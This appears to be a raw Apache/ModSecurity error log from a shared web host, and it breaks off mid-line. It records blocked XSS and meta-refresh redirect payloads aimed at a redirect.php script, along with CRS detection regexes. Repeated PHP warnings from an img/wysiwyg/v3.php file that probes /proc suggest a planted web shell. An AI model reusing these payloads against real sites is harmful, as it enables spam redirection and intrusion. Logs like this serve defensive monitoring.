PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1706011/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1706011/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1706011/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:56:38.674774 2026] [security2:error] [pid 1842385:tid 1842394] [client 192.144.148.122:58994] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agKk9hs7kySIUZ3ORnIuQwAAAQQ"]
[Tue May 12 05:56:47.484927 2026] [security2:error] [pid 1825179:tid 1825219] [client 192.144.148.122:37332] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agKk_9r1yOh9TvizezimRAAAAFU"], referer: http://www.tchatbooster.com
PHP Warning:  filesize(): stat failed for /proc/1705356/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705356/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705356/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705356/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705356/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705356/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:57:37.755179 2026] [security2:error] [pid 1825179:tid 1825216] [client 139.155.126.16:38434] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.ixinabourgoin.fr"] [uri "/"] [unique_id "agKlMdr1yOh9Tvizezim7QAAAFI"]
[Tue May 12 05:57:43.001877 2026] [security2:error] [pid 1820198:tid 1820216] [client 23.21.175.228:20698] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/freeadultcamtocam.com"] [unique_id "agKlN81tk6y7yBJLpJo_hAAAAJA"]
[Tue May 12 05:57:43.002196 2026] [security2:error] [pid 1820198:tid 1820216] [client 23.21.175.228:20698] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/freeadultcamtocam.com"] [unique_id "agKlN81tk6y7yBJLpJo_hAAAAJA"]
[Tue May 12 05:57:43.002504 2026] [security2:error] [pid 1820198:tid 1820216] [client 23.21.175.228:20698] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/freeadultcamtocam.com"] [unique_id "agKlN81tk6y7yBJLpJo_hAAAAJA"]
PHP Warning:  filesize(): stat failed for /proc/666/task/666/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/666/task/666/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/666/task/666/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/666/task/666/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/666/task/666/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/666/task/666/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:58:20.557611 2026] [ssl:error] [pid 1842385:tid 1842401] (EAI 2)Name or service not known: [client 85.121.55.238:44488] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 05:58:20.557660 2026] [ssl:error] [pid 1842385:tid 1842401] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/80/task/80/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/80/task/80/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/80/task/80/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/80/task/80/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/80/task/80/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/80/task/80/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:59:26.664136 2026] [security2:error] [pid 1825287:tid 1825309] [client 43.159.57.144:35008] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "bender.piregwan-genesis.com"] [uri "/"] [unique_id "agKlnggpmE1yW0glLdg2kQAAAMQ"], referer: http://bender.piregwan-genesis.com
[Tue May 12 05:59:44.905815 2026] [ssl:error] [pid 1825287:tid 1825319] (EAI 2)Name or service not known: [client 24.72.150.239:57452] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:59:44.905851 2026] [ssl:error] [pid 1825287:tid 1825319] AH01941: stapling_renew_response: responder error
[Tue May 12 05:59:50.801610 2026] [security2:error] [pid 1825287:tid 1825318] [client 43.134.178.104:53928] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/mixeur/"] [unique_id "agKltggpmE1yW0glLdg2uAAAAM0"]
[Tue May 12 06:00:06.945323 2026] [security2:error] [pid 1842385:tid 1842400] [client 43.130.74.193:45532] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/lassociation-fetons-les-bauges-tattend-a-lescheraines/"] [unique_id "agKlxhs7kySIUZ3ORnIv1QAAAQo"]
[Tue May 12 06:00:21.563998 2026] [security2:error] [pid 1825287:tid 1825304] [client 43.157.95.239:41334] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/typha/"] [unique_id "agKl1QgpmE1yW0glLdg2_AAAAMA"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174182/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174182/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174182/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174182/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174182/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174182/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:00:52.411438 2026] [:error] [pid 1842385:tid 1842410] [client 46.151.178.13:59096] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Tue May 12 06:01:17.167291 2026] [proxy_fcgi:error] [pid 1825287:tid 1825326] [client 163.172.31.86:57758] AH01071: Got error 'Primary script unknown'
[Tue May 12 06:01:17.366598 2026] [proxy_fcgi:error] [pid 1808852:tid 1808862] [client 163.172.31.86:57742] AH01071: Got error 'Primary script unknown'
[Tue May 12 06:01:23.564187 2026] [security2:error] [pid 1844863:tid 1844870] [client 43.156.204.134:41614] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2023/02/Echo-Narcisse-et-lart-daimer-extrait-8.mp3"] [unique_id "agKmE_aAnTZtx1_H_wzAqAAAAUE"]
[Tue May 12 06:01:23.666677 2026] [security2:error] [pid 1808852:tid 1808855] [client 170.106.152.218:37918] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmExfeipD4uoG21Fo7ZgAAAAA"]
[Tue May 12 06:01:41.949820 2026] [:error] [pid 1844863:tid 1844872] [client 45.198.224.9:16830] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:01:45.108027 2026] [authz_core:error] [pid 1844863:tid 1844887] [client 17.246.23.91:51122] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/gregwar/captcha/error_log
[Tue May 12 06:01:48.656749 2026] [security2:error] [pid 1820198:tid 1820221] [client 194.233.64.127:51104] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>urutan kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLM1tk6y7yBJLpJpA-wAAAJU"]
[Tue May 12 06:01:48.657339 2026] [security2:error] [pid 1820198:tid 1820221] [client 194.233.64.127:51104] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Pastein.ru/l/utb>urutan kampus Terbaik di Indonesia</a><meta http-equiv=refresh content=0;url=https://Pastein.ru/l/utb /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Pastein.ru/l/utb>urutan kampus Terbaik di Indonesia</a><meta http-equiv=refresh content=0;url=https://Pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLM1tk6y7yBJLpJpA-wAAAJU"]
[Tue May 12 06:01:48.657572 2026] [security2:error] [pid 1820198:tid 1820221] [client 194.233.64.127:51104] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Pastein.ru/l/utb /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Pastein.ru/l/utb>urutan kampus Terbaik di Indonesia</a><meta http-equiv=refresh content=0;url=https://Pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLM1tk6y7yBJLpJpA-wAAAJU"]
[Tue May 12 06:01:48.657710 2026] [security2:error] [pid 1820198:tid 1820221] [client 194.233.64.127:51104] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Pastein.ru/l/utb>urutan kampus Terbaik di Indonesia</a><meta http-equiv=refresh content=0;url=https://Pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLM1tk6y7yBJLpJpA-wAAAJU"]
[Tue May 12 06:01:48.657974 2026] [security2:error] [pid 1820198:tid 1820221] [client 194.233.64.127:51104] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Pastein.ru/l/utb>urutan kampus Terbaik di Indonesia</a><meta http-equiv=refresh content=0;url=https://Pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLM1tk6y7yBJLpJpA-wAAAJU"]
[Tue May 12 06:01:48.658494 2026] [security2:error] [pid 1820198:tid 1820221] [client 194.233.64.127:51104] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLM1tk6y7yBJLpJpA-wAAAJU"]
[Tue May 12 06:01:48.658771 2026] [security2:error] [pid 1820198:tid 1820221] [client 194.233.64.127:51104] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLM1tk6y7yBJLpJpA-wAAAJU"]
[Tue May 12 06:01:49.287126 2026] [security2:error] [pid 1842385:tid 1842390] [client 194.233.64.127:51120] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/%evolv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>urutan kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLRs7kySIUZ3ORnIwWQAAAQA"]
[Tue May 12 06:01:49.287510 2026] [security2:error] [pid 1842385:tid 1842390] [client 194.233.64.127:51120] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Pastein.ru/l/utb>urutan kampus Terbaik di Indonesia</a><meta http-equiv=refresh content=0;url=https://Pastein.ru/l/utb /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Pastein.ru/l/utb>urutan kampus Terbaik di Indonesia</a><meta http-equiv=refresh content=0;url=https://Pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLRs7kySIUZ3ORnIwWQAAAQA"]
[Tue May 12 06:01:49.287713 2026] [security2:error] [pid 1842385:tid 1842390] [client 194.233.64.127:51120] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Pastein.ru/l/utb /> found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Pastein.ru/l/utb>urutan kampus Terbaik di Indonesia</a><meta http-equiv=refresh content=0;url=https://Pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLRs7kySIUZ3ORnIwWQAAAQA"]
[Tue May 12 06:01:49.287811 2026] [security2:error] [pid 1842385:tid 1842390] [client 194.233.64.127:51120] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Pastein.ru/l/utb>urutan kampus Terbaik di Indonesia</a><meta http-equiv=refresh content=0;url=https://Pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag 